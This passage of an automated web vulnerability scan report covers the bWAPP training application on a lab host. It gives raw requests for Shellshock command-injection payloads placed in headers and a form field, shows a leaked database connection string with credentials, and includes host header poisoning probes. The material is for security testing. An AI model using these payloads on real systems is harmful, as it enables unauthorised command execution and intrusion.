Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13136

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
</p>

<form action="/bWAPP/xmli_1.php" method="GET">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password" size="20" autocomplete="off" /></p>
...[SNIP]...
4.15. http://192.168.52.147/bWAPP/xss_login.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/xss_login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /bWAPP/xss_login.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security=maybe

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:57:24 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13122

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
</p>

<form action="/bWAPP/xss_login.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password" size="20" autocomplete="off" /></p>
...[SNIP]...
5. Code injection

There are 3 instances of this issue:

5.1. http://192.168.52.147/bWAPP/cgi-bin/shellshock.sh [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/cgi-bin/shellshock.sh

Note: This issue was generated by the Burp extension: Active Scan++.

Issue detail

The application appears to evaluate user input as code.

It was instructed to sleep for 0 seconds, and a response time of 0.34299993515 seconds was observed.
It was then instructed to sleep for 10 seconds, which resulted in a response time of 11.256000042 seconds

Request 1

GET /bWAPP/cgi-bin/shellshock.sh HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: () { :;}; /bin/sleep 0
Connection: close
Referer: http://192.168.52.147/bWAPP/shellshock.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

Response 1

HTTP/1.1 500 Internal Server Error
Date: Fri, 09 Mar 2018 03:17:37 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Content-Length: 709
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /bWAPP/cgi-bin/shellshock.sh HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: () { :;}; /bin/sleep 11
Connection: close
Referer: http://192.168.52.147/bWAPP/shellshock.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

Response 2

HTTP/1.1 500 Internal Server Error
Date: Fri, 09 Mar 2018 03:17:37 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Content-Length: 709
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
5.2. http://192.168.52.147/bWAPP/clickjacking.php [bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Note: This issue was generated by the Burp extension: Active Scan++.

Issue detail

The application appears to evaluate user input as code.

It was instructed to sleep for 0 seconds, and a response time of 0.0809998512268 seconds was observed.
It was then instructed to sleep for 10 seconds, which resulted in a response time of 15.1239998341 seconds

Request 1

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

bug=()%20%7b%20_%3b%20%7d%20%3e_[$($())]%20%7b%20%2fbin%2fsleep%200%3b%20%7d&form_bug=submit

Response 1

HTTP/1.1 302 Found
Date: Fri, 09 Mar 2018 04:02:19 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location:
Content-Length: 0
Connection: close
Content-Type: text/html

Request 2

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

bug=()%20%7b%20_%3b%20%7d%20%3e_[$($())]%20%7b%20%2fbin%2fsleep%2011%3b%20%7d&form_bug=submit

Response 2

HTTP/1.1 302 Found
Date: Fri, 09 Mar 2018 04:02:19 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location:
Content-Length: 0
Connection: close
Content-Type: text/html

5.3. http://192.168.52.147/bWAPP/commandi.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/commandi.php

Note: This issue was generated by the Burp extension: Active Scan++.

Issue detail

The application appears to evaluate user input as code.

It was instructed to sleep for 0 seconds, and a response time of 0.0280001163483 seconds was observed.
It was then instructed to sleep for 10 seconds, which resulted in a response time of 11.0279998779 seconds

Request 1

GET /bWAPP/commandi.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: () { _; } >_[$($())] { /bin/sleep 0; }
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:41:43 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12930

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...

Request 2

GET /bWAPP/commandi.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: () { _; } >_[$($())] { /bin/sleep 11; }
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:41:43 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12930

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
6. Session token in URL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/csrf_2.php

Issue detail

The URL in the request appears to contain a session token within the query string:
  • http://192.168.52.147/bWAPP/csrf_2.php?amount=0&action=transfer&account=123-45678-90&token=8ffdc6d2c70804d4f177b2198dd4603d313efb70

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Vulnerability classifications

Request 1

GET /bWAPP/csrf_2.php?amount=0&action=transfer&account=123-45678-90&token=8ffdc6d2c70804d4f177b2198dd4603d313efb70 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/csrf_2.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:57:29 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13464

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
7. Database connection string disclosed

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/passwords/web.config.bak

Issue detail

The following database connection string was disclosed in the response:
  • datasource=bee-box;initialcatalog=bwapp;persistsecurityinfo=true;userid=wolverine;password=log@n
The connection string appears to contain:
  • Database name or location
  • Username
  • Password

    Issue background

    A database connection string specifies information about a data source and the means of connecting to it. In web applications, connection strings are generally used by the application tier to connect to the back-end database used for storing application data. They are usually read from server-side configuration files or hard-coded into application source code.

    Vulnerability classifications

    Request 1

    GET /bWAPP/passwords/web.config.bak HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/passwords/?C=N;O=D
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:29 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce017-1d84-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 7556
    Connection: close
    Content-Type: application/x-trash

    ...<?xml version="1.0"?>
    <configuration>
       <configSections>
           <sectionGroup name="system.web.extensions" type="System.Web.Configuration.SystemWebExtensionsSectionGroup, System.Web.Extensions, Versio
    ...[SNIP]...
    <add name="bWAPPConnectionString" connectionString="Data Source=bee-box;Initial Catalog=bWAPP;Persist Security Info=True;User ID=wolverine;Password=Log@N"/>
    ...[SNIP]...
    8. The file 'sqli_10-1.php' includes a vulnerable version of the library 'jquery'

    There are 3 instances of this issue:

    8.1. http://192.168.52.147/bWAPP/sqli_10-1.php

    Summary

    Severity:   Medium
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/sqli_10-1.php

    Note: This issue was generated by the Burp extension: Retire.js.

    Issue detail

    The library jquery version 1.4.4.min has known security issues.
    For more information, visit those websites:

    Affected versions

    The vulnerability affects all versions prior to 1.6.3 (between * and 1.6.3)

    Other considerations

    The vulnerability might affect a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered a false positive.

    The library name and its version are identified based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

    Request 1

    GET /bWAPP/sqli_10-1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:13 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 14733

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    <script src="js/jquery-1.4.4.min.js">
    ...[SNIP]...
    8.2. http://192.168.52.147/bWAPP/sqli_10-1.php

    Summary

    Severity:   Medium
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/sqli_10-1.php

    Note: This issue was generated by the Burp extension: Retire.js.

    Issue detail

    The library jquery version 1.4.4.min has known security issues.
    For more information, visit those websites:

    Affected versions

    The vulnerability affects all versions prior to 1.9.0b1 (between * and 1.9.0b1)

    Other considerations

    The vulnerability might affect a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered a false positive.

    The library name and its version are identified based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

    Request 1

    GET /bWAPP/sqli_10-1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:13 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 14733

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    <script src="js/jquery-1.4.4.min.js">
    ...[SNIP]...
    8.3. http://192.168.52.147/bWAPP/sqli_10-1.php

    Summary

    Severity:   Medium
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/sqli_10-1.php

    Note: This issue was generated by the Burp extension: Retire.js.

    Issue detail

    The library jquery version 1.4.4.min has known security issues.
    For more information, visit those websites:

    Affected versions

    The vulnerability affects all versions prior to 1.12.0 (between 1.4.0 and 1.12.0)

    Other considerations

    The vulnerability might affect a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered a false positive.

    The library name and its version are identified based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

    Request 1

    GET /bWAPP/sqli_10-1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:13 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 14733

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    <script src="js/jquery-1.4.4.min.js">
    ...[SNIP]...
    9. Host header poisoning

    There are 6 instances of this issue:

    9.1. http://192.168.52.147/bWAPP/aim.php [PHPSESSID cookie]

    Summary

    Severity:   Medium
    Confidence:   Tentative
    Host:   http://192.168.52.147
    Path:   /bWAPP/aim.php

    Note: This issue was generated by the Burp extension: Active Scan++.

    Issue detail

    The application appears to trust the user-supplied host header. By supplying a malicious host header with a password reset request, it may be possible to generate a poisoned password reset link. Consider testing the host header for classic server-side injection vulnerabilities.

    Depending on the configuration of the server and any intervening caching devices, it may also be possible to use this for cache poisoning attacks.

    Resources:
    • http://carlos.bueno.org/2008/06/host-header-injection.html
    • http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

    Request 1

    GET /bWAPP/aim.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/http_response_splitting.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 03:03:23 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 9959

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" />

    <title>bWAPP -
    ...[SNIP]...

    Request 2

    GET /bWAPP/aim.php?cachebust=1520564607.25 HTTP/1.1
    Host: ueznlk.192.168.52.147
    Cache-Control: no-cache
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/http_response_splitting.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 2

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 03:03:27 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 9990

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" />

    <title>bWAPP -
    ...[SNIP]...
    <p>2. Point your web scanner, crawler or attack tool to this URL: http://ueznlk.192.168.52.147/bWAPP/aim.php?cachebust=1520564607.25</p>
    ...[SNIP]...
    9.2. http://192.168.52.147/bWAPP/fonts/ [security_level cookie]

    Summary

    Severity:   Medium
    Confidence:   Tentative
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/

    Note: This issue was generated by the Burp extension: Active Scan++.

    Issue detail

    The application appears to trust the user-supplied host header. By supplying a malicious host header with a password reset request, it may be possible to generate a poisoned password reset link. Consider testing the host header for classic server-side injection vulnerabilities.

    Depending on the configuration of the server and any intervening caching devices, it may also be possible to use this for cache poisoning attacks.

    Resources:
    • http://carlos.bueno.org/2008/06/host-header-injection.html
    • http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

    Request 1

    GET /bWAPP/fonts/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:24:53 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 2527
    Connection: close
    Content-Type: text/html;charset=UTF-8
    X-Pad: avoid browser bug

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <head>
    <title>Index of /bWAPP/fonts</title>
    </head>
    <body>
    <h1>Index of /bWAPP/fonts</h1>
    <table><tr><th><img src="/icons/blank.gif"
    ...[SNIP]...

    Request 2

    GET /bWAPP/fonts/?cachebust=1520569491.18 HTTP/1.1
    Host: br78zs.192.168.52.147
    Cache-Control: no-cache
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 2

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:24:54 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 2534
    Connection: close
    Content-Type: text/html;charset=UTF-8
    X-Pad: avoid browser bug

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <head>
    <title>Index of /bWAPP/fonts</title>
    </head>
    <body>
    <h1>Index of /bWAPP/fonts</h1>
    <table><tr><th><img src="/icons/blank.gif"
    ...[SNIP]...
    <address>Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Server at br78zs.192.168.52.147 Port 80</address>
    ...[SNIP]...
    9.3. http://192.168.52.147/bWAPP/logs/ [PHPSESSID cookie]

    Summary

    Severity:   Medium
    Confidence:   Tentative
    Host:   http://192.168.52.147
    Path:   /bWAPP/logs/

    Note: This issue was generated by the Burp extension: Active Scan++.

    Issue detail

    The application appears to trust the user-supplied host header. By supplying a malicious host header with a password reset request, it may be possible to generate a poisoned password reset link. Consider testing the host header for classic server-side injection vulnerabilities.

    Depending on the configuration of the server and any intervening caching devices, it may also be possible to use this for cache poisoning attacks.

    Resources:
    • http://carlos.bueno.org/2008/06/host-header-injection.html
    • http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

    Request 1

    GET /bWAPP/logs/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 05:03:30 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 988
    Connection: close
    Content-Type: text/html;charset=UTF-8
    X-Pad: avoid browser bug

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <head>
    <title>Index of /bWAPP/logs</title>
    </head>
    <body>
    <h1>Index of /bWAPP/logs</h1>
    <table><tr><th><img src="/icons/blank.gif" a
    ...[SNIP]...

    Request 2

    GET /bWAPP/logs/?cachebust=1520571808.55 HTTP/1.1
    Host: ma3mnu.192.168.52.147
    Cache-Control: no-cache
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 2

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 05:03:33 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 995
    Connection: close
    Content-Type: text/html;charset=UTF-8
    X-Pad: avoid browser bug

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <head>
    <title>Index of /bWAPP/logs</title>
    </head>
    <body>
    <h1>Index of /bWAPP/logs</h1>
    <table><tr><th><img src="/icons/blank.gif" a
    ...[SNIP]...
    <address>Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Server at ma3mnu.192.168.52.147 Port 80</address>
